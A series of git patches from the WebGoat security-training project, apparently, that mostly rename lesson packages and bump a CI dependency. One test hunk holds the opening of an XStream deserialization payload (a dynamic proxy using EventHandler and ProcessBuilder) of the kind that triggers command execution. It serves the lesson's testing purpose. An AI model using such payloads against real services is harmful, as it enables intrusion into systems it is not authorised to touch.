diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
similarity index 95%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
index 48b4b334f..60c7e357c 100644
--- a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc
+++ b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
@@ -13,6 +13,6 @@ WebGoat uses an XML document to add contacts to a contacts database.
 </contact>  
 ----
 
-The java interface that you need for the exercise is: org.owasp.webgoat.vulnerable_components.Contact.
+The java interface that you need for the exercise is: org.owasp.webgoat.vulnerablecomponents.Contact.
 Start by sending the above contact to see what the normal response would be and then read the CVE vulnerability  documentation (search the Internet) and try to trigger the vulnerability.
 For this example, we will let you enter the XML directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`.
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content6.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content6.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_plan.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html b/src/main/resources/lessons/vulnerablecomponents/html/VulnerableComponents.html
similarity index 83%
rename from src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html
rename to src/main/resources/lessons/vulnerablecomponents/html/VulnerableComponents.html
index dd123bf09..a281cb8d0 100644
--- a/src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html
+++ b/src/main/resources/lessons/vulnerablecomponents/html/VulnerableComponents.html
@@ -4,20 +4,20 @@
 
     <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css" />
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_plan.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content0.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content1.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content1a.adoc"></div>
 	</div>
 
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content2.adoc"></div>
 		<div class="attack-container">
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
 			<div id="lessonContent">
@@ -45,7 +45,7 @@
 			</div>
 
 		</div>
-		<div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content2a.adoc"></div>
 		<div class="attack-container">
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
 			<div id="lessonContent">
@@ -75,26 +75,26 @@
 		</div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content3.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content4.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content4a.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content4b.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content4c.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content5.adoc"></div>
 	</div>
 	
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc"></div>
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 			<form class="attack-form" accept-charset="UNKNOWN"
@@ -120,7 +120,7 @@
 		</div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerablecomponents/documentation/VulnerableComponents_content6.adoc"></div>
 	</div>
 	
 </html>
diff --git a/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties b/src/main/resources/lessons/vulnerablecomponents/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/vulnerablecomponents/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/vulnerable_components/images/OWASP-2013-A9.png b/src/main/resources/lessons/vulnerablecomponents/images/OWASP-2013-A9.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/OWASP-2013-A9.png
rename to src/main/resources/lessons/vulnerablecomponents/images/OWASP-2013-A9.png
diff --git a/src/main/resources/lessons/vulnerable_components/images/OWASP-Dep-Check.png b/src/main/resources/lessons/vulnerablecomponents/images/OWASP-Dep-Check.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/OWASP-Dep-Check.png
rename to src/main/resources/lessons/vulnerablecomponents/images/OWASP-Dep-Check.png
diff --git a/src/main/resources/lessons/vulnerable_components/images/Old-Components.png b/src/main/resources/lessons/vulnerablecomponents/images/Old-Components.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/Old-Components.png
rename to src/main/resources/lessons/vulnerablecomponents/images/Old-Components.png
diff --git a/src/main/resources/lessons/vulnerable_components/images/OpenSourceGrowing.png b/src/main/resources/lessons/vulnerablecomponents/images/OpenSourceGrowing.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/OpenSourceGrowing.png
rename to src/main/resources/lessons/vulnerablecomponents/images/OpenSourceGrowing.png
diff --git a/src/main/resources/lessons/vulnerable_components/images/Risk-of-Old-Components.png b/src/main/resources/lessons/vulnerablecomponents/images/Risk-of-Old-Components.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/Risk-of-Old-Components.png
rename to src/main/resources/lessons/vulnerablecomponents/images/Risk-of-Old-Components.png
diff --git a/src/main/resources/lessons/vulnerable_components/images/WebGoat-Vulns.png b/src/main/resources/lessons/vulnerablecomponents/images/WebGoat-Vulns.png
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/images/WebGoat-Vulns.png
rename to src/main/resources/lessons/vulnerablecomponents/images/WebGoat-Vulns.png
diff --git a/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
similarity index 92%
rename from src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
rename to src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
index b52953a11..eed97faab 100644
--- a/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
@@ -20,12 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.StreamException;
 import org.junit.jupiter.api.Disabled;
 import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.vulnerablecomponents.Contact;
+import org.owasp.webgoat.lessons.vulnerablecomponents.ContactImpl;
 
 import static org.junit.jupiter.api.Assertions.assertNotNull;
 import static org.junit.jupiter.api.Assertions.assertThrows;
@@ -34,7 +36,7 @@ import static org.junit.jupiter.api.Assertions.assertTrue;
 public class VulnerableComponentsLessonTest {
 
 	String strangeContact = "<contact class='dynamic-proxy'>\n" + 
-			"<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>\n" + 
+			"<interface>org.owasp.webgoat.vulnerablecomponents.Contact</interface>\n" + 
 			"  <handler class='java.beans.EventHandler'>\n" + 
 			"    <target class='java.lang.ProcessBuilder'>\n" + 
 			"      <command>\n" + 

From 251167c6b055ed9a9ee0618a679b432a88209b36 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:45:12 +0200
Subject: [PATCH 193/227] Renamed to webgoatintroduction

---
 .../WebGoatIntroduction.java                        |   2 +-
 .../html/WebGoatIntroduction.html                   |   8 --------
 .../documentation/Introduction.adoc                 |   0
 .../documentation/Introduction_de.adoc              |   0
 .../documentation/Introduction_fr.adoc              |   0
 .../documentation/Introduction_nl.adoc              |   0
 .../html/WebGoatIntroduction.html                   |   8 ++++++++
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/wg_logo.png                              | Bin
 9 files changed, 9 insertions(+), 9 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{webgoat_introduction => webgoatintroduction}/WebGoatIntroduction.java (96%)
 delete mode 100644 src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/documentation/Introduction.adoc (100%)
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/documentation/Introduction_de.adoc (100%)
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/documentation/Introduction_fr.adoc (100%)
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/documentation/Introduction_nl.adoc (100%)
 create mode 100644 src/main/resources/lessons/webgoatintroduction/html/WebGoatIntroduction.html
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{webgoat_introduction => webgoatintroduction}/images/wg_logo.png (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java
rename to src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
index 6f726d9f2..35c876700 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.webgoat_introduction;
+package org.owasp.webgoat.lessons.webgoatintroduction;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html b/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
deleted file mode 100644
index be5b50d67..000000000
--- a/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
+++ /dev/null
@@ -1,8 +0,0 @@
-<!DOCTYPE html>
-<html xmlns:th="http://www.thymeleaf.org">
-
-<div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/webgoat_introduction/documentation/Introduction.adoc"></div>
-</div>
-
-</html>
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc b/src/main/resources/lessons/webgoatintroduction/documentation/Introduction.adoc
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
rename to src/main/resources/lessons/webgoatintroduction/documentation/Introduction.adoc
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc b/src/main/resources/lessons/webgoatintroduction/documentation/Introduction_de.adoc
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc
rename to src/main/resources/lessons/webgoatintroduction/documentation/Introduction_de.adoc
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc b/src/main/resources/lessons/webgoatintroduction/documentation/Introduction_fr.adoc
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
rename to src/main/resources/lessons/webgoatintroduction/documentation/Introduction_fr.adoc
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc b/src/main/resources/lessons/webgoatintroduction/documentation/Introduction_nl.adoc
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc
rename to src/main/resources/lessons/webgoatintroduction/documentation/Introduction_nl.adoc
diff --git a/src/main/resources/lessons/webgoatintroduction/html/WebGoatIntroduction.html b/src/main/resources/lessons/webgoatintroduction/html/WebGoatIntroduction.html
new file mode 100644
index 000000000..c1863ef98
--- /dev/null
+++ b/src/main/resources/lessons/webgoatintroduction/html/WebGoatIntroduction.html
@@ -0,0 +1,8 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/webgoatintroduction/documentation/Introduction.adoc"></div>
+</div>
+
+</html>
diff --git a/src/main/resources/lessons/webgoat_introduction/i18n/WebGoatLabels.properties b/src/main/resources/lessons/webgoatintroduction/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/webgoatintroduction/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/webgoat_introduction/images/wg_logo.png b/src/main/resources/lessons/webgoatintroduction/images/wg_logo.png
similarity index 100%
rename from src/main/resources/lessons/webgoat_introduction/images/wg_logo.png
rename to src/main/resources/lessons/webgoatintroduction/images/wg_logo.png

From 50f932b02efb6c3bbc69e3369e3162a83d058b2c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:49:30 +0200
Subject: [PATCH 194/227] Renamed to webwolfintroduction

---
 .../Email.java                                      |   2 +-
 .../LandingAssignment.java                          |   4 ++--
 .../MailAssignment.java                             |   2 +-
 .../WebWolfIntroduction.java                        |   2 +-
 .../documentation/IntroductionWebWolf.adoc          |   0
 .../documentation/Landing_page.adoc                 |   0
 .../documentation/Receiving_mail.adoc               |   0
 .../documentation/Uploading_files.adoc              |   0
 .../html/WebWolfIntroduction.html                   |   8 ++++----
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/files.png                                | Bin
 .../images/mailbox.png                              | Bin
 .../images/requests.png                             | Bin
 .../images/wolf-enabled.png                         | Bin
 .../templates/webwolfPasswordReset.html             |   0
 15 files changed, 9 insertions(+), 9 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{webwolf_introduction => webwolfintroduction}/Email.java (81%)
 rename src/main/java/org/owasp/webgoat/lessons/{webwolf_introduction => webwolfintroduction}/LandingAssignment.java (94%)
 rename src/main/java/org/owasp/webgoat/lessons/{webwolf_introduction => webwolfintroduction}/MailAssignment.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{webwolf_introduction => webwolfintroduction}/WebWolfIntroduction.java (96%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/documentation/IntroductionWebWolf.adoc (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/documentation/Landing_page.adoc (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/documentation/Receiving_mail.adoc (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/documentation/Uploading_files.adoc (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/html/WebWolfIntroduction.html (88%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/images/files.png (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/images/mailbox.png (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/images/requests.png (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/images/wolf-enabled.png (100%)
 rename src/main/resources/lessons/{webwolf_introduction => webwolfintroduction}/templates/webwolfPasswordReset.html (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
similarity index 81%
rename from src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
index 56e33fa7c..524384689 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolfintroduction;
 
 import lombok.Builder;
 import lombok.Data;
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
similarity index 94%
rename from src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
index 19a09a3ad..a7243d07d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolfintroduction;
 
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -63,7 +63,7 @@ public class LandingAssignment extends AssignmentEndpoint {
         modelAndView.addObject("webwolfUrl", landingPageUrl);
         modelAndView.addObject("uniqueCode", StringUtils.reverse(getWebSession().getUserName()));
 
-        modelAndView.setViewName("lessons/webwolf_introduction/templates/webwolfPasswordReset.html");
+        modelAndView.setViewName("lessons/webwolfintroduction/templates/webwolfPasswordReset.html");
         return modelAndView;
     }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
index 4d7af9279..ec5b1c6a6 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolfintroduction;
 
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
index 818222e3b..240132413 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolfintroduction;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
rename to src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc
diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/Landing_page.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/documentation/Landing_page.adoc
rename to src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc
diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/Receiving_mail.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/documentation/Receiving_mail.adoc
rename to src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc
diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/Uploading_files.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/documentation/Uploading_files.adoc
rename to src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc
diff --git a/src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html b/src/main/resources/lessons/webwolfintroduction/html/WebWolfIntroduction.html
similarity index 88%
rename from src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html
rename to src/main/resources/lessons/webwolfintroduction/html/WebWolfIntroduction.html
index 1986fd263..64784bc2c 100644
--- a/src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html
+++ b/src/main/resources/lessons/webwolfintroduction/html/WebWolfIntroduction.html
@@ -2,15 +2,15 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Uploading_files.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolfintroduction/documentation/Uploading_files.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Receiving_mail.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolfintroduction/documentation/Receiving_mail.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -66,7 +66,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Landing_page.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolfintroduction/documentation/Landing_page.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/src/main/resources/lessons/webwolf_introduction/i18n/WebGoatLabels.properties b/src/main/resources/lessons/webwolfintroduction/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/webwolfintroduction/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/webwolf_introduction/images/files.png b/src/main/resources/lessons/webwolfintroduction/images/files.png
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/images/files.png
rename to src/main/resources/lessons/webwolfintroduction/images/files.png
diff --git a/src/main/resources/lessons/webwolf_introduction/images/mailbox.png b/src/main/resources/lessons/webwolfintroduction/images/mailbox.png
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/images/mailbox.png
rename to src/main/resources/lessons/webwolfintroduction/images/mailbox.png
diff --git a/src/main/resources/lessons/webwolf_introduction/images/requests.png b/src/main/resources/lessons/webwolfintroduction/images/requests.png
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/images/requests.png
rename to src/main/resources/lessons/webwolfintroduction/images/requests.png
diff --git a/src/main/resources/lessons/webwolf_introduction/images/wolf-enabled.png b/src/main/resources/lessons/webwolfintroduction/images/wolf-enabled.png
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/images/wolf-enabled.png
rename to src/main/resources/lessons/webwolfintroduction/images/wolf-enabled.png
diff --git a/src/main/resources/lessons/webwolf_introduction/templates/webwolfPasswordReset.html b/src/main/resources/lessons/webwolfintroduction/templates/webwolfPasswordReset.html
similarity index 100%
rename from src/main/resources/lessons/webwolf_introduction/templates/webwolfPasswordReset.html
rename to src/main/resources/lessons/webwolfintroduction/templates/webwolfPasswordReset.html

From 3308f89acccbe1ab4827a6650b1ae3edd600ee93 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 6 Aug 2022 21:59:58 +0200
Subject: [PATCH 195/227] Bump actions/cache from 3.0.5 to 3.0.6 (#1320)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.5 to 3.0.6.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.5...v3.0.6)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index fbfeb40ad..e1d98dc81 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.5
+        uses: actions/cache@v3.0.6
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.5
+          uses: actions/cache@v3.0.6
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 28186fef0..34edf11d8 100644
--- a/.github/workflows/release.yml
